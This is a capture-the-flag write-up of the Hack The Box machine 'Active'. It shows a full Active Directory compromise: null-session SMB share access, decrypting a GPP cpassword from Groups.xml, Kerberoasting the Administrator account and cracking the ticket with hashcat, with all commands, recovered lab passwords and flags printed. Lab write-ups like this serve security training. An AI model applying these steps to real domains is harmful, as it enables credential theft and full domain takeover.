Overview

The machine starts by SMB null auth enumeration that discovers a Replication share containing a Groups.xml file with a GPP-encrypted password, decrypting it yields credentials for SVC_TGS to access the Users share and grab the user flag, then Kerberoasting the domain reveals an Administrator TGS ticket that cracks offline to get full admin access over smb and read the root flag.

Enumeration

i will start with nmap for enumeration as usual

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/active]
└──╼ [★]$ nmap -sC -sV -v -oA init 10.129.7.87
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-06-02 06:45 PDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 06:45
Completed NSE at 06:45, 0.00s elapsed
Initiating NSE at 06:45
Completed NSE at 06:45, 0.00s elapsed
Initiating NSE at 06:45
Completed NSE at 06:45, 0.00s elapsed
Initiating Ping Scan at 06:45
Scanning 10.129.7.87 [2 ports]
Completed Ping Scan at 06:45, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 06:45
Completed Parallel DNS resolution of 1 host. at 06:45, 0.10s elapsed
Initiating Connect Scan at 06:45
Scanning 10.129.7.87 [1000 ports]
Discovered open port 139/tcp on 10.129.7.87
Discovered open port 53/tcp on 10.129.7.87
Discovered open port 445/tcp on 10.129.7.87
Discovered open port 135/tcp on 10.129.7.87
Discovered open port 49153/tcp on 10.129.7.87
Discovered open port 49155/tcp on 10.129.7.87
Discovered open port 636/tcp on 10.129.7.87
Discovered open port 464/tcp on 10.129.7.87
Discovered open port 49154/tcp on 10.129.7.87
Increasing send delay for 10.129.7.87 from 0 to 5 due to max_successful_tryno increase to 4
Discovered open port 49157/tcp on 10.129.7.87
Discovered open port 3268/tcp on 10.129.7.87
Discovered open port 389/tcp on 10.129.7.87
Discovered open port 3269/tcp on 10.129.7.87
Discovered open port 49152/tcp on 10.129.7.87
Discovered open port 88/tcp on 10.129.7.87
Discovered open port 593/tcp on 10.129.7.87
Discovered open port 49158/tcp on 10.129.7.87
Completed Connect Scan at 06:45, 17.06s elapsed (1000 total ports)
Initiating Service scan at 06:45
Scanning 17 services on 10.129.7.87
Completed Service scan at 06:46, 62.20s elapsed (17 services on 1 host)
NSE: Script scanning 10.129.7.87.
Initiating NSE at 06:46
Completed NSE at 06:47, 9.15s elapsed
Initiating NSE at 06:47
Completed NSE at 06:47, 4.80s elapsed
Initiating NSE at 06:47
Completed NSE at 06:47, 0.00s elapsed
Nmap scan report for 10.129.7.87
Host is up (0.17s latency).
Not shown: 983 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
| _ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-06-02 13:46:00Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| _clock-skew: 2s
| smb2-security-mode:
| 2:1:0:
| _ Message signing enabled and required
| smb2-time:
| date: 2026-06-02T13:46:57
| _ start_date: 2026-06-02T12:18:13

NSE: Script Post-scanning.
Initiating NSE at 06:47
Completed NSE at 06:47, 0.00s elapsed
Initiating NSE at 06:47
Completed NSE at 06:47, 0.00s elapsed
Initiating NSE at 06:47
Completed NSE at 06:47, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 94.36 seconds

and as you can see a lot of Active Directory Ports so it is a DC Environment with the Domain name active.htb so add this to our hosts file

shell

sudo vi /etc/hosts
>
10.129.7.87 active.htb

Lets first try smb with guest account if we can access or not and this one also leaks that the name is DC so the FQDN would be DC.active.htb so add this also to hosts file and add the hostname only

one weird thing I've seen in the nmap results is this DNS version that mentions the server is 2008 which is pretty old and it leaks the DNS version which might be vulnerable to something so lets search it

plaintext

53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)                 
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)

but i won't go though this rabbit hole right now

First i wanted to try different simple usernames and one was an empty username and password which somehow lets us read the shares and we see that we got read over a share called Replication so lets connect and see what is there

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/active]
└──╼ [★]$ nxc smb 10.129.7.87 -u '' -p '' --shares
SMB 10.129.7.87 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.7.87 445 DC [+] active.htb\:
SMB 10.129.7.87 445 DC [*] Enumerated shares
SMB 10.129.7.87 445 DC Share Permissions Remark
SMB 10.129.7.87 445 DC ----- ----------- ------
SMB 10.129.7.87 445 DC ADMIN$ Remote Admin
SMB 10.129.7.87 445 DC C$ Default share
SMB 10.129.7.87 445 DC IPC$ Remote IPC
SMB 10.129.7.87 445 DC NETLOGON Logon server share
SMB 10.129.7.87 445 DC Replication READ
SMB 10.129.7.87 445 DC SYSVOL Logon server share
SMB 10.129.7.87 445 DC Users

Replication share looks like a synced share for the SYSVOL so lets download all files and take a look maybe we find some GPPs or something

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/active]
└──╼ [★]$ smbclient //10.129.7.87/Replication -U''%''
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jul 21 03:37:44 2018
  ..                                  D        0  Sat Jul 21 03:37:44 2018
  active.htb                          D        0  Sat Jul 21 03:37:44 2018

                5217023 blocks of size 4096. 279764 blocks available
smb: \> cd active.htb\
smb: \active.htb\> ls
  .                                   D        0  Sat Jul 21 03:37:44 2018
  ..                                  D        0  Sat Jul 21 03:37:44 2018
  DfsrPrivate DHS 0 Sat Jul 21 03:37:44 2018
  Policies D 0 Sat Jul 21 03:37:44 2018
  scripts D 0 Wed Jul 18 11:48:57 2018

                5217023 blocks of size 4096. 279764 blocks available

there is a cleaner way to download all files but this one will just do it so lets take a look at that Groups.xml file

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/active]
└──╼ [★]$ smbclient //10.129.7.87/Replication -U''%'' -c 'recurse ON; mget *'
Get directory active.htb? y
Get directory DfsrPrivate? y
Get directory Policies? y
Get directory scripts? y
Get directory ConflictAndDeleted? y
Get directory Deleted? y
Get directory Installing? y
Get directory {31B2F340-016D-11D2-945F-00C04FB984F9}? y
Get directory {6AC1786C-016F-11D2-945F-00C04fB984F9}? y
Get file GPT.INI? y
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
Get directory Group Policy? y
Get directory MACHINE? y
Get directory USER? y
Get file GPT.INI? y
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
Get directory MACHINE? y
Get directory USER? y
Get file GPE.INI? y
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI (0.3 KiloBytes/sec) (average 0.1 KiloBytes/sec)
Get directory Microsoft? y
Get directory Preferences? y
Get file Registry.pol? y
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol (4.7 KiloBytes/sec) (average 1.5 KiloBytes/sec)
Get directory Microsoft? y
Get directory Windows NT? y
Get directory Groups? y
Get directory Windows NT? y
Get directory SecEdit? y
Get file Groups.xml? y
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml (1.2 KiloBytes/sec) (average 1.4 KiloBytes/sec)
Get directory SecEdit? y
Get file GptTmpl.inf? y
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (2.5 KiloBytes/sec) (average 1.6 KiloBytes/sec)
Get file GptTmpl.inf? y
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (6.2 KiloBytes/sec) (average 2.4 KiloBytes/sec)

and By looking for this Groups.xml we'll see this

plaintext

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/active/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups]
└──╼ [★]$ cat Groups.xml 
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

and as you can see we got this cpasswd <Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>

GPP

with what is cpasswd and GPP ?

cpassword is a Group Policy Preferences (GPP) encrypted password. Here's the background: When admins used GPP to set local admin passwords via Group Policy, Windows stored them in Groups.xml inside SYSVOL/Replication, readable by any domain user Microsoft encrypted them with AES-256... but then published the static decryption key in their own documentation (MS14-025) (funny story by mistake wink-wink) so lets try and decrypt it

xml

<Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>

and we got the password for the user `SVC_TGS

shell

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/active/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups]
└──╼ [★]$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18

and as you can see we can authenticate and we got access to more shares so lets take a look at the shares if we can see anything

bash

─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/active]
└──╼ [★]$ nxc smb 10.129.7.87 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18'
SMB 10.129.7.87 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.7.87 445 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/active]
└──╼ [★]$ nxc smb 10.129.7.87 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --shares
SMB 10.129.7.87 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.7.87 445 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
SMB 10.129.7.87 445 DC [*] Enumerated shares
SMB 10.129.7.87 445 DC Share Permissions Remark
SMB 10.129.7.87 445 DC ----- ----------- ------
SMB 10.129.7.87 445 DC ADMIN$ Remote Admin
SMB 10.129.7.87 445 DC C$ Default share
SMB 10.129.7.87 445 DC IPC$ Remote IPC
SMB 10.129.7.87 445 DC NETLOGON READ Logon server share
SMB 10.129.7.87 445 DC Replication READ
SMB 10.129.7.87 445 DC SYSVOL READ Logon server share
SMB 10.129.7.87 445 DC Users READ

and as you can see, firstly i expected the Users to have some kind of configuration for Users not the actual users folder and we got the flag of the user

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/active]
└──╼ [★]$ smbclient //10.129.7.87/Users -U'SVC_TGS'%'GPPstillStandingStrong2k18'
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Sat Jul 21 07:39:20 2018
  ..                                 DR        0  Sat Jul 21 07:39:20 2018
  Administrator D 0 Mon Jul 16 03:14:21 2018
  All Users DHSrn 0 Mon Jul 13 22:06:44 2009
  Default DHR 0 Mon Jul 13 23:38:21 2009
  Default User DHSrn 0 Mon Jul 13 22:06:44 2009
  desktop.ini                       AHS      174  Mon Jul 13 21:57:55 2009
  Public DR 0 Mon Jul 13 21:57:55 2009
  SVC_TGS D 0 Sat Jul 21 08:16:32 2018
c
                5217023 blocks of size 4096. 279748 blocks available
smb: \> cd SVC_TGS\Desktop\
smb: \SVC_TGS\Desktop\> ls
  .                                   D        0  Sat Jul 21 08:14:42 2018
  ..                                  D        0  Sat Jul 21 08:14:42 2018
  user.txt                           AR       34  Tue Jun  2 05:19:11 2026

                5217023 blocks of size 4096. 279748 blocks available
smb: \SVC_TGS\Desktop\> cat user.txt
cat: command not found
smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \SVC_TGS\Desktop\>

and here is the user flag

shell

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/active]
└──╼ [★]$ cat user.txt 
f43bb4d3c4716ebae86e0835698fad52

earlier i tried also the User with ldap and it worked so lets run rusthound and look at what this user can do and we got 5 users and 49 groups so lets take a look at that user

bash

─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/active]
└──╼ [★]$ rusthound -d active.htb -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -i 10.129.7.87
---------------------------------------------------
Initializing RustHound at 07:35:21 on 06/02/26
Powered by g0h4n from OpenCyber
---------------------------------------------------

[2026-06-02T14:35:21Z INFO  rusthound] Verbosity level: Info
[2026-06-02T14:35:21Z INFO  rusthound::ldap] Connected to ACTIVE.HTB Active Directory!
[2026-06-02T14:35:21Z INFO  rusthound::ldap] Starting data collection...
[2026-06-02T14:35:24Z INFO  rusthound::ldap] All data collected for NamingContext DC=active,DC=htb
[2026-06-02T14:35:24Z INFO  rusthound::json::parser] Starting the LDAP objects parsing...
[2026-06-02T14:35:24Z INFO  rusthound::json::parser::bh_41] MachineAccountQuota: 10
[2026-06-02T14:35:24Z INFO  rusthound::json::parser] Parsing LDAP objects finished!
[2026-06-02T14:35:24Z INFO  rusthound::json::checker] Starting checker to replace some values...
[2026-06-02T14:35:24Z INFO  rusthound::json::checker] Checking and replacing some values finished!
[2026-06-02T14:35:24Z INFO  rusthound::json::maker] 5 users parsed!
[2026-06-02T14:35:24Z INFO  rusthound::json::maker] .//20260602073524_active-htb_users.json created!
[2026-06-02T14:35:24Z INFO  rusthound::json::maker] 49 groups parsed!
[2026-06-02T14:35:24Z INFO  rusthound::json::maker] .//20260602073524_active-htb_groups.json created!
[2026-06-02T14:35:24Z INFO  rusthound::json::maker] 1 computers parsed!
[2026-06-02T14:35:24Z INFO  rusthound::json::maker] .//20260602073524_active-htb_computers.json created!
[2026-06-02T14:35:24Z INFO  rusthound::json::maker] 1 ous parsed!
[2026-06-02T14:35:24Z INFO  rusthound::json::maker] .//20260602073524_active-htb_ous.json created!
[2026-06-02T14:35:24Z INFO  rusthound::json::maker] 1 domains parsed!
[2026-06-02T14:35:24Z INFO  rusthound::json::maker] .//20260602073524_active-htb_domains.json created!
[2026-06-02T14:35:24Z INFO  rusthound::json::maker] 2 gpos parsed!
[2026-06-02T14:35:24Z INFO  rusthound::json::maker] .//20260602073524_active-htb_gpos.json created!
[2026-06-02T14:35:24Z INFO  rusthound::json::maker] 21 containers parsed!
[2026-06-02T14:35:24Z INFO  rusthound::json::maker] .//20260602073524_active-htb_containers.json created!

RustHound Enumeration Completed at 07:35:24 on 06/02/26! Happy Graphing!

nothing came back useful for the bloodhound data so I decided to list all users and Kerberoast them and try AS-REP roast also I will list all users first

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/active]
└──╼ [★]$ nxc ldap 10.129.7.87 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --users
LDAP 10.129.7.87 389 DC [*] Windows 7 / Server 2008 R2 Build 7601 (name:DC) (domain:active.htb) (signing:None) (chan
nel binding:No TLS cert)
LDAP 10.129.7.87 389 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
LDAP 10.129.7.87 389 DC [*] Enumerated 4 domain users: active.htb
LDAP 10.129.7.87 389 DC -Username- -Last PW Set- -BadPW- -Description-

LDAP 10.129.7.87 389 DC Administrator 2018-07-18 12:06:40 0 Built-in account for administerin
g the computer/domain
LDAP 10.129.7.87 389 DC Guest < never> 0 Built-in account for guest access
 to the computer/domain
LDAP 10.129.7.87 389 DC krbtgt 2018-07-18 11:50:36 0 Key Distribution Center Service A
ccount
LDAP 10.129.7.87 389 DC SVC_TGS 2018-07-18 13:14:38 0

and as you can see we got hash for the administrator so lets try and crack it

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/active]
└──╼ [★]$ nxc ldap 10.129.7.87 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --kerberoasting users
LDAP 10.129.7.87 389 DC [*] Windows 7 / Server 2008 R2 Build 7601 (name:DC) (domain:active.htb) (signing:None) (channel binding:No TLS cert)
LDAP 10.129.7.87 389 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
LDAP 10.129.7.87 389 DC [*] Skipping disabled account: krbtgt
LDAP 10.129.7.87 389 DC [*] Total of records returned 1
LDAP 10.129.7.87 389 DC [*] sAMAccountName: Administrator, memberOf: ['CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb', 'CN=Domain Admins,CN=Users,DC=active,DC=htb' , 'CN=Enterprise Admins,CN=Users,DC=active,DC=htb' , 'CN=Schema Admins,CN=Users,DC=active,DC=htb' , 'CN=Administrators,CN=Builtin,DC=active,DC=htb' ], pwdLastSet: 2018-07-18 12:06:40.351723, lastLogon: 2026-06-02 05:19:13.807343
LDAP 10.129.7.87 389 DC $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb\Administrator*$5243e5fe8aab6d6b8712c11e95e9efc4$c6c09dbec6644d351605034c95a49617f19892a1969e70295e52b80759fb6c1c1229d58e6dfaeef980f982c32fe67e51cb50e1a035431abf65412c1c2ed28a5522593590fbbd51bcfd1234e4bac7404e3a8f6825f30720a579e98b713245e45a747e5e52b6dd3dc4181346fa52f2dd0f80e08917b93d41b04450afbdd9866d96e08cc64a4697d5371fc002d54c643443ff7706c9e0a78f6eb87788dc1ac7bc48e7eeb104ae330cad614212d4a95429605bb3a490b7889e9bea5c3e01001723fb3982a8945d08d7894e8afa284b07943535c44c0f1e83a76161fc9b970fe0ac1275f77836be11b4a787649550f0e9639354e0ed9cd2128f0458062f8b932b5cb389c7ba5b2db79b8cc8d200de569f5d8e926e916472bb53df9667484ad945e769e351269bf57aa42addc63c64cce2af0b39010a04a6f2ad75fdd5f0ec16c2cbec19d21a1515c1cec4d36d1f9e32ea39ade050b9adfd0868857757b66a8f6646d277c3e71ff86359a70cee22b524d55a1f3688d87ede20303215ea15b76a1b19a4ea34da5a679601ed3a0721ea4be39e263286b49bc796f1a6be4c8747c124903cfc954812676bba4b2723a945511ec1afa9baa2f119c818e3fc730aec3f1779aa2169b2574b9eaf124cc9b1ab38db17e7bb81ba993eec04ad3d8651f1b31ca9dd98fae24fb8a5ccf4ead11cafd1a2fc357a6341a99b5ea420ef7cf53cd52259b12ebca571c642094bba9a3aca76e8ec05930f17b2fc133e0a9c3e8bd7f77042993249b2618808c585e3555b934273c6410bc7bffc5bb0d2f096816dad98a247dc50eb338349398700e7d80cb15ba6baaba82d67352853e0bd9c50bfdb74d4f96168e61bf7d2dc847f9380a1cd3f79b01a897e6ca8f28a3322b82c5e47bfbf2e0725b4b2bc3842d96f86773b6b2780a936dd0690b11573149aec45df9f7db1851a2753c7fe3d15b4eeb90b6fdb5e2670954888c5bb92d89e4a7ab3612b05320f46bf11b5e6622a5d7ee4b89d14b66e4cfe265911750ba036bbf81fba858e0f35ab61f1eb145352d310b713bf48be930ef6a49d429721e5638a3bca7fa26e8cdc025e722e6740aa247d0ba22d15b817dec42386f2815ed7f56060295dd3d6802953b80325c5008d2fcfaded25c86982a0e0e38ba6ea31d7a24a78dda1a6a558a041db574ac8a84ad73ae49e6cc5ef9403605f05406b9e93b47fe37143d35a412fb45536df2dc8c0127911ad10f725fdbebc6c0e85c1be4982ca51ce

and as you can see we cracked the administrator hash I won't even bother looking for WINRM or a shell i will just grab it from the share

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/active]
└──╼ [★]$ hashcat -a 0 administrator.hash /usr/share/wordlists/rockyou.txt
hashcat (v7.1.2-382-g2d71af371) starting in autodetect mode

OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #01: cpu-haswell-Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz, 1453/2907 MB (512 MB allocatable), 2MCU

Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol
< SNIP>

$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb\Administrator*$5243e5fe8aab6d6b8712c11e95e9efc4$c6c09dbec6644d351605034c95a49617f19892a1969e70295e52b80759fb6c1c1229d58e6dfaeef980f982c32fe67e51cb50e1a035431abf65412c1c2ed28a5522593590fbbd51bcfd1234e4bac7404e3a8f6825f30720a579e98b713245e45a747e5e52b6dd3dc4181346fa52f2dd0f80e08917b93d41b04450afbdd9866d96e08cc64a4697d5371fc002d54c643443ff7706c9e0a78f6eb87788dc1ac7bc48e7eeb104ae330cad614212d4a95429605bb3a490b7889e9bea5c3e01001723fb3982a8945d08d7894e8afa284b07943535c44c0f1e83a76161fc9b970fe0ac1275f77836be11b4a787649550f0e9639354e0ed9cd2128f0458062f8b932b5cb389c7ba5b2db79b8cc8d200de569f5d8e926e916472bb53df9667484ad945e769e351269bf57aa42addc63c64cce2af0b39010a04a6f2ad75fdd5f0ec16c2cbec19d21a1515c1cec4d36d1f9e32ea39ade050b9adfd0868857757b66a8f6646d277c3e71ff86359a70cee22b524d55a1f3688d87ede20303215ea15b76a1b19a4ea34da5a679601ed3a0721ea4be39e263286b49bc796f1a6be4c8747c124903cfc954812676bba4b2723a945511ec1afa9baa2f119c818e3fc730aec3f1779aa2169b2574b9eaf124cc9b1ab38db17e7bb81ba993eec04ad3d8651f1b31ca9dd98fae24fb8a5ccf4ead11cafd1a2fc357a6341a99b5ea420ef7cf53cd52259b12ebca571c642094bba9a3aca76e8ec05930f17b2fc133e0a9c3e8bd7f77042993249b2618808c585e3555b934273c6410bc7bffc5bb0d2f096816dad98a247dc50eb338349398700e7d80cb15ba6baaba82d67352853e0bd9c50bfdb74d4f96168e61bf7d2dc847f9380a1cd3f79b01a897e6ca8f28a3322b82c5e47bfbf2e0725b4b2bc3842d96f86773b6b2780a936dd0690b11573149aec45df9f7db1851a2753c7fe3d15b4eeb90b6fdb5e2670954888c5bb92d89e4a7ab3612b05320f46bf11b5e6622a5d7ee4b89d14b66e4cfe265911750ba036bbf81fba858e0f35ab61f1eb145352d310b713bf48be930ef6a49d429721e5638a3bca7fa26e8cdc025e722e6740aa247d0ba22d15b817dec42386f2815ed7f56060295dd3d6802953b80325c5008d2fcfaded25c86982a0e0e38ba6ea31d7a24a78dda1a6a558a041db574ac8a84ad73ae49e6cc5ef9403605f05406b9e93b47fe37143d35a412fb45536df2dc8c0127911ad10f725fdbebc6c0e85c1be4982ca51ce:Ticketmaster1968

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb\Ad...ca51ce
Time.Started.....: Tue Jun  2 07:49:24 2026 (18 secs)
Time.Estimated...: Tue Jun  2 07:49:42 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........:   610.1 kH/s (3.63ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10539008/14344385 (73.47%)
Rejected.........: 0/10539008 (0.00%)
Restore.Point....: 10536960/14344385 (73.46%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: Tiffany95 -> Thelittlemermaid
Hardware.Mon.#01.: Util: 88%

Started: Tue Jun  2 07:49:12 2026
Stopped: Tue Jun  2 07:49:44 2026

and we got root flag

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/active]
└──╼ [★]$ smbclient //10.129.7.87/Users -U'Administrator'%'Ticketmaster1968' -c 'ls Administrator\Desktop\'
  .                                  DR        0  Thu Jan 21 08:49:47 2021
  ..                                 DR        0  Thu Jan 21 08:49:47 2021
  desktop.ini                       AHS      282  Mon Jul 30 06:50:10 2018
  root.txt                           AR       34  Tue Jun  2 05:19:11 2026

                5217023 blocks of size 4096. 279492 blocks available
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/active]
└──╼ [★]$ smbclient //10.129.7.87/Users -U'Administrator'%'Ticketmaster1968' -c 'get Administrator\Desktop\root.txt root.txt'
getting file \Administrator\Desktop\root.txt of size 34 as root.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/active]
└──╼ [★]$ cat root.txt 
7cdb36e03c6f6dcd1aca6f6b8a7bf610

Resources

there is not much we have for this box you can look at my Kerberoasting blog here

HTB: Active

Overview

Enumeration

GPP

Resources

Share

Subscribe to the newsletter

Overview

Enumeration

Replication Share

GPP

SVC_TGS Users Share

Users Share as Administrator

Resources

Share

Subscribe to the newsletter